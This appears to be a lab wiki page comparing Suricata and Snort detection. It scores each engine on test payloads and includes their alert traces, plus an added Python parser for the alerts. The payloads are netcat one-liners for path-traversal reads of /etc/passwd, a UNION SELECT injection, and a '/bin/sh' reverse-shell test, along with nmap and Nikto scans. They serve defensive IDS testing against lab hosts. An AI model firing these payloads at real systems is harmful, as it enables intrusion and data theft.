Suricata-vs-snort/Test-cases/Test-rules

Test rules

Synthesis

Test                            Suricata  Snort
Simple LFI                      1         1
LFI using NULL byte             1         1
Full SYN scan                   0         1
Full Connect() port scan        0         1
SQL Injection (UNION SELECT)    1         0
Netcat reverse shell            1         1
Nikto scan                      2         1
TOTAL                           6         6

Simple LFI

  • Test: LFI
  • Payload:
echo "GET /index.php?page=../../../etc/passwd HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041202 Firefox/1.0\r\n\r\n" | nc 192.168.100.35 80
  • Suricata trace:
04/09/2011-10:53:29.625769  [**] [1:1122:8] WEB-MISC /etc/passwd [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.100.45:56588 -> 192.168.100.35:80
  • Suricata score: 1
  • Snort trace:
[**] [1:1122:8] WEB-MISC /etc/passwd [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:02:26.433483 192.168.100.45:53934 -> 192.168.100.48:80
TCP TTL:64 TOS:0x0 ID:46637 IpLen:20 DgmLen:228 DF
***AP*** Seq: 0xBFE14A2D  Ack: 0x63F11DA3  Win: 0x5C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2554887 14316932 

[**] [1:2570:12] WEB-MISC Invalid HTTP Version String [**]
[Classification: Detection of a non-standard protocol or event] [Priority: 2] 
04/20-08:02:26.433483 192.168.100.45:53934 -> 192.168.100.48:80
TCP TTL:64 TOS:0x0 ID:46637 IpLen:20 DgmLen:228 DF
***AP*** Seq: 0xBFE14A2D  Ack: 0x63F11DA3  Win: 0x5C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2554887 14316932 
[Xref => http://cgi.nessus.org/plugins/dump.php3?id=11593][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-0478][Xref => http://www.securityfocus.com/bid/9809][Xref => http://www.securityfocus.com/bid/34240]
  • Snort score: 1

LFI using NULL byte

  • Test: LFI with NULL byte
  • Payload:
echo "GET /index.php?page=../../../etc/passwd%00 HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041202 Firefox/1.0\r\n\r\n" | nc 192.168.100.35 80
  • Suricata trace:
04/09/2011-10:53:29.625769  [**] [1:1122:8] WEB-MISC /etc/passwd [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.100.45:56588 -> 192.168.100.35:80
  • Suricata score: 1
  • Snort trace:
[**] [1:1122:8] WEB-MISC /etc/passwd [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:04:30.328756 192.168.100.45:53949 -> 192.168.100.48:80
TCP TTL:64 TOS:0x0 ID:44285 IpLen:20 DgmLen:231 DF
***AP*** Seq: 0x32BFDA00  Ack: 0xD7FA85BF  Win: 0x5C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2585861 14347906 

[**] [1:2570:12] WEB-MISC Invalid HTTP Version String [**]
[Classification: Detection of a non-standard protocol or event] [Priority: 2] 
04/20-08:04:30.328756 192.168.100.45:53949 -> 192.168.100.48:80
TCP TTL:64 TOS:0x0 ID:44285 IpLen:20 DgmLen:231 DF
***AP*** Seq: 0x32BFDA00  Ack: 0xD7FA85BF  Win: 0x5C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2585861 14347906 
[Xref => http://cgi.nessus.org/plugins/dump.php3?id=11593][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-0478][Xref => http://www.securityfocus.com/bid/9809][Xref => http://www.securityfocus.com/bid/34240]
  • Snort score: 1

Full SYN scan

  • Test: Nmap full SYN scan
  • Payload:
sudo nmap -sS -p- 192.168.100.35
  • Suricata trace:
03/10/11-07:18:32.142741 [**] [1:2002911:4] ET SCAN Potential VNC Scan 5900-5920 [**] [Classification: Attempted Information Leak] [Priority: 3] {6} 192.168.100.37:45743 -> 192.168.100.35:5915 [Xref => http://doc.emergingthreats.net/2002911][Xref => http://www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_VNC]
03/10/2011-11:47:54.043095 [**] [1:2010939:2] ET POLICY Suspicious inbound to PostgreSQL port 5432 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.37:33445 -> 192.168.100.35:5432
03/10/2011-11:48:05.658677 [**] [1:2010935:2] ET POLICY Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.37:33445 -> 192.168.100.35:1433
03/10/2011-11:48:07.586325 [**] [1:2010936:2] ET POLICY Suspicious inbound to Oracle SQL port 1521 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.37:33445 -> 192.168.100.35:1521
  • Suricata score: 0
  • Snort trace:
[**] [122:1:1] PSNG_TCP_PORTSCAN [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:21:43.275110 192.168.100.45 -> 192.168.100.48
PROTO:255 TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:164 DF

[**] [1:1420:14] SNMP trap tcp [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:21:55.230376 192.168.100.45:36234 -> 192.168.100.48:162
TCP TTL:46 TOS:0x0 ID:42097 IpLen:20 DgmLen:44
******S* Seq: 0x75721B7E  Ack: 0x0  Win: 0xC00  TcpLen: 24
TCP Options (1) => MSS: 1460 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1421:14] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:21:59.405686 192.168.100.45:36234 -> 192.168.100.48:705
TCP TTL:56 TOS:0x0 ID:64248 IpLen:20 DgmLen:44
******S* Seq: 0x75721B7E  Ack: 0x0  Win: 0x400  TcpLen: 24
TCP Options (1) => MSS: 1460 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1418:14] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:22:02.992574 192.168.100.45:36234 -> 192.168.100.48:161
TCP TTL:53 TOS:0x0 ID:20910 IpLen:20 DgmLen:44
******S* Seq: 0x75721B7E  Ack: 0x0  Win: 0x800  TcpLen: 24
TCP Options (1) => MSS: 1460 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]
  • Snort score: 1

Full Connect() port scan

  • Test: Nmap Connect() scan (full portscan)
  • Payload:
nmap -sT -p- 192.168.100.35
  • Suricata trace:
03/10/2011-11:50:18.996416 [**] [1:2010937:2] ET POLICY Suspicious inbound to mySQL port 3306 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.37:48340 -> 192.168.100.35:3306
03/10/2011-11:50:21.655106 [**] [1:2010936:2] ET POLICY Suspicious inbound to Oracle SQL port 1521 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.37:47206 -> 192.168.100.35:1521
03/10/2011-11:50:24.950351 [**] [1:2002910:4] ET SCAN Potential VNC Scan 5800-5820 [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.100.37:33214 -> 192.168.100.35:5808
03/10/2011-11:50:31.612656 [**] [1:2010939:2] ET POLICY Suspicious inbound to PostgreSQL port 5432 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.37:55158 -> 192.168.100.35:5432
03/10/2011-11:50:33.084266 [**] [1:2010935:2] ET POLICY Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.37:49763 -> 192.168.100.35:1433
03/10/2011-11:50:38.919067 [**] [1:2010938:2] ET POLICY Suspicious inbound to mSQL port 4333 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.100.37:41224 -> 192.168.100.35:4333
  • Suricata score: 0
  • Snort trace:
[**] [122:1:1] PSNG_TCP_PORTSCAN [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:23:31.704995 192.168.100.45 -> 192.168.100.48
PROTO:255 TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:163 DF

[**] [1:1420:14] SNMP trap tcp [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:23:36.338489 192.168.100.45:56607 -> 192.168.100.48:162
TCP TTL:64 TOS:0x0 ID:24886 IpLen:20 DgmLen:60 DF
******S* Seq: 0x61D1B511  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 2872359 0 NOP WS: 6 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1418:14] SNMP request tcp [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:23:47.095424 192.168.100.45:42487 -> 192.168.100.48:161
TCP TTL:64 TOS:0x0 ID:64314 IpLen:20 DgmLen:60 DF
******S* Seq: 0x6C4C259D  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 2875047 0 NOP WS: 6 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]

[**] [1:1421:14] SNMP AgentX/tcp request [**]
[Classification: Attempted Information Leak] [Priority: 2] 
04/20-08:23:47.874158 192.168.100.45:39828 -> 192.168.100.48:705
TCP TTL:64 TOS:0x0 ID:44658 IpLen:20 DgmLen:60 DF
******S* Seq: 0x6C977119  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 2875243 0 NOP WS: 6 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0013][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0012][Xref => http://www.securityfocus.com/bid/4132][Xref => http://www.securityfocus.com/bid/4089][Xref => http://www.securityfocus.com/bid/4088]
  • Snort score: 1

SQL Injection (UNION SELECT)

  • Test: SQL Injection: UNION SELECT
  • Payload:
echo "GET /form.php?q=1+UNION+SELECT+VERSION%28%29 HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n" | nc 192.168.100.35 80
  • Suricata trace:
03/10/2011-13:50:28.905522 [**] [1:2011037:3] ET WEB_SERVER Possible Attempt to Get SQL Server Version in URI using SELECT VERSION [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.100.37:56483 -> 192.168.100.35:80
03/10/2011-13:50:28.905522 [**] [1:2006446:11] ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.100.37:56483 -> 192.168.100.35:80
  • Suricata score: 1
  • Snort trace:
[**] [1:2570:12] WEB-MISC Invalid HTTP Version String [**]
[Classification: Detection of a non-standard protocol or event] [Priority: 2] 
04/20-08:24:58.892304 192.168.100.45:48032 -> 192.168.100.48:80
TCP TTL:64 TOS:0x0 ID:11238 IpLen:20 DgmLen:133 DF
***AP*** Seq: 0xAEFA0F23  Ack: 0x543004B1  Win: 0x5C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2892998 14655046 
[Xref => http://cgi.nessus.org/plugins/dump.php3?id=11593][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-0478][Xref => http://www.securityfocus.com/bid/9809][Xref => http://www.securityfocus.com/bid/34240]
  • Snort score: 0

Netcat reverse shell

  • Test: Reverse shell (netcat)
  • Payload:
echo "/bin/sh" | nc 192.168.100.36 22
  • Suricata trace:
03/18/2011-16:35:02.790596  [**] [1:1324:10] EXPLOIT ssh CRC32 overflow /bin/sh [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 192.168.100.37:51409 -> 192.168.100.35:22
  • Suricata score: 1
  • Snort trace:
[**] [1:1324:10] EXPLOIT ssh CRC32 overflow /bin/sh [**]
[Classification: Executable code was detected] [Priority: 1] 
04/20-09:15:17.730318 192.168.100.45:33123 -> 192.168.100.48:22
TCP TTL:64 TOS:0x0 ID:53828 IpLen:20 DgmLen:60 DF
***AP*** Seq: 0xB4907A94  Ack: 0x59EB5F7E  Win: 0x5C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 3647698 15409756 
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0572][Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2001-0144][Xref => http://www.securityfocus.com/bid/2347]
  • Snort score: 1

Nikto scan

  • Test: Nikto scan (only cgi plugin)
  • Payload (nikto):
sudo ./nikto.pl -h 192.168.100.35 -Plugins cgi
  • Suricata trace:
03/14/2011-10:27:46.841236  [**] [1:1071:6] GPL WEB_SERVER .htpasswd access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.100.18:43160 -> 192.168.100.35:80
03/14/2011-10:27:47.502170  [**] [1:1201:7] GPL WEB_SERVER 403 Forbidden [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.100.35:80 -> 192.168.100.18:43162
03/14/2011-10:28:13.416060  [**] [1:2002677:10] ET SCAN Nikto Web App Scan in Progress [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.100.18:43165 -> 192.168.100.35:80
03/14/2011-10:28:13.934586  [**] [1:1201:7] GPL WEB_SERVER 403 Forbidden [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.100.35:80 -> 192.168.100.18:43166 
  • Suricata score: 2
  • Snort trace:
[**] [1:1233:13] WEB-CLIENT Outlook EML access [**]
[Classification: Attempted User Privilege Gain] [Priority: 1] 

[**] [1:1245:17] WEB-IIS ISAPI .idq access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:971:17] WEB-IIS ISAPI .printer access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:1071:8] WEB-MISC .htpasswd access [**]
[Classification: Web Application Attack] [Priority: 1] 

[**] [1:1129:9] WEB-MISC .htaccess access [**]
[Classification: Attempted Information Leak] [Priority: 2] 

[**] [1:1129:9] WEB-MISC .htaccess access [**]
[Classification: Attempted Information Leak] [Priority: 2] 

[**] [1:1242:17] WEB-IIS ISAPI .ida access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:1044:12] WEB-IIS webhits access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:1131:8] WEB-MISC .wwwacl access [**]
[Classification: Attempted Information Leak] [Priority: 2] 

[**] [1:16630:2] POLICY download of .dat file [**]
[Classification: Misc activity] [Priority: 3] 

[**] [1:16629:2] POLICY download of .bin file [**]
[Classification: Misc activity] [Priority: 3] 

[**] [1:987:21] WEB-IIS .htr access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:977:19] WEB-IIS .cnf access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:1130:8] WEB-MISC .wwwacl access [**]
[Classification: Attempted Information Leak] [Priority: 2] 

[**] [1:1668:10] WEB-CGI /cgi-bin/ access [**]
[Classification: Web Application Attack] [Priority: 1] 

[**] [1:1880:7] WEB-MISC oracle web application server access [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2] 

[**] [1:1029:14] WEB-IIS scripts-browse access [**]
[Classification: Web Application Attack] [Priority: 1] 
  • Snort score: 1
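Every score in the test cases above comes from reading the two trace formats by hand: Suricata's one-line fast.log alerts and Snort's multi-line full alerts. The Python below is an added example, not code from the aldeid page or from either IDS project. It parses both formats into one record type and checks whether the signatures a test expects actually fired, listing the alerts that fired for unrelated reasons (such as the Snort "Invalid HTTP Version String" event that accompanies every netcat-based payload on this page). The sample input is copied from the SQL injection and SYN scan traces above; the signature sets SQLI_SIGS and SCAN_SIGS are my own choice of what counts as a relevant detection for those two tests, not something the page defines.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Added example (not from the aldeid page): one record type for alerts from
# both engines, built from the trace formats quoted in the test cases.


@dataclass(frozen=True)
class Alert:
    gid: int
    sid: int
    rev: int
    msg: str
    classification: str
    priority: int
    src: str = ""   # "ip:port", or only "ip" for Snort portscan events
    dst: str = ""


# Suricata fast.log puts the whole alert on one line.
SURICATA_LINE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+"
    r"(?P<msg>.+?)\s+\[\*\*\]\s+\[Classification:\s*(?P<cls>[^\]]*)\]\s+"
    r"\[Priority:\s*(?P<prio>\d+)\]\s+\{(?P<proto>\w+)\}\s+"
    r"(?P<src>\S+)\s+->\s+(?P<dst>\S+)"
)

# Snort full alerts: header line, classification line, optional flow line,
# then packet details and Xref lines that this parser deliberately ignores.
SNORT_HEADER = re.compile(
    r"^\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.+?)\s+\[\*\*\]$"
)
SNORT_CLASS = re.compile(
    r"^\[Classification:\s*(?P<cls>[^\]]*)\]\s+\[Priority:\s*(?P<prio>\d+)\]$"
)
SNORT_FLOW = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+->\s+(?P<dst>\S+)$")


def parse_suricata(text: str) -> list[Alert]:
    """Parse fast.log lines; lines that are not alerts are skipped."""
    alerts = []
    for line in text.splitlines():
        m = SURICATA_LINE.match(line.strip())
        if m:
            alerts.append(Alert(int(m["gid"]), int(m["sid"]), int(m["rev"]),
                                m["msg"], m["cls"], int(m["prio"]),
                                m["src"], m["dst"]))
    return alerts


def parse_snort(text: str) -> list[Alert]:
    """Parse blank-line separated Snort full alert blocks."""
    alerts = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = [l.strip() for l in block.splitlines() if l.strip()]
        if len(lines) < 2:
            continue
        head, cls = SNORT_HEADER.match(lines[0]), SNORT_CLASS.match(lines[1])
        if not (head and cls):
            continue
        flow = SNORT_FLOW.match(lines[2]) if len(lines) > 2 else None
        alerts.append(Alert(int(head["gid"]), int(head["sid"]), int(head["rev"]),
                            head["msg"], cls["cls"], int(cls["prio"]),
                            flow["src"] if flow else "", flow["dst"] if flow else ""))
    return alerts


def detected(alerts: list[Alert], relevant_sids: set[tuple[int, int]]) -> bool:
    """True when at least one alert comes from a signature the test expects."""
    return any((a.gid, a.sid) in relevant_sids for a in alerts)


def unrelated(alerts: list[Alert], relevant_sids: set[tuple[int, int]]) -> list[str]:
    """Messages of alerts that fired but are not part of the expected set."""
    return sorted({a.msg for a in alerts if (a.gid, a.sid) not in relevant_sids})


# Sample input copied from the SQL injection and SYN scan traces on the page.
SURICATA_SQLI = """\
03/10/2011-13:50:28.905522 [**] [1:2011037:3] ET WEB_SERVER Possible Attempt to Get SQL Server Version in URI using SELECT VERSION [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.100.37:56483 -> 192.168.100.35:80
03/10/2011-13:50:28.905522 [**] [1:2006446:11] ET WEB_SERVER Possible SQL Injection Attempt UNION SELECT [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.100.37:56483 -> 192.168.100.35:80
"""
SNORT_SQLI = """\
[**] [1:2570:12] WEB-MISC Invalid HTTP Version String [**]
[Classification: Detection of a non-standard protocol or event] [Priority: 2]
04/20-08:24:58.892304 192.168.100.45:48032 -> 192.168.100.48:80
TCP TTL:64 TOS:0x0 ID:11238 IpLen:20 DgmLen:133 DF
***AP*** Seq: 0xAEFA0F23  Ack: 0x543004B1  Win: 0x5C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 2892998 14655046
[Xref => http://cgi.nessus.org/plugins/dump.php3?id=11593]
"""
SNORT_SCAN = """\
[**] [122:1:1] PSNG_TCP_PORTSCAN [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/20-08:21:43.275110 192.168.100.45 -> 192.168.100.48
PROTO:255 TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:164 DF
"""

# My own choice of "relevant" signatures per test (gid, sid); not defined by the page.
SQLI_SIGS = {(1, 2011037), (1, 2006446)}   # the two ET SQLi rules seen in Suricata
SCAN_SIGS = {(122, 1)}                     # Snort sfPortscan TCP portscan event


def compare_sqli() -> dict:
    """Reproduce the page's SQLi verdict: Suricata detects, Snort only emits noise."""
    suri, snort = parse_suricata(SURICATA_SQLI), parse_snort(SNORT_SQLI)
    return {"suricata": detected(suri, SQLI_SIGS),
            "snort": detected(snort, SQLI_SIGS),
            "snort_unrelated": unrelated(snort, SQLI_SIGS)}


if __name__ == "__main__":
    print(compare_sqli())
    print(detected(parse_snort(SNORT_SCAN), SCAN_SIGS))
```

The separation into detected versus unrelated alerts is the check worth running before assigning a score: a trace full of alerts is not the same as a detection of the technique under test. One thing to verify when reproducing the netcat payloads is whether the shell's echo interprets the \r\n escapes; if it does not, the request line carries literal backslash sequences, which would by itself explain a Snort "Invalid HTTP Version String" alert.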
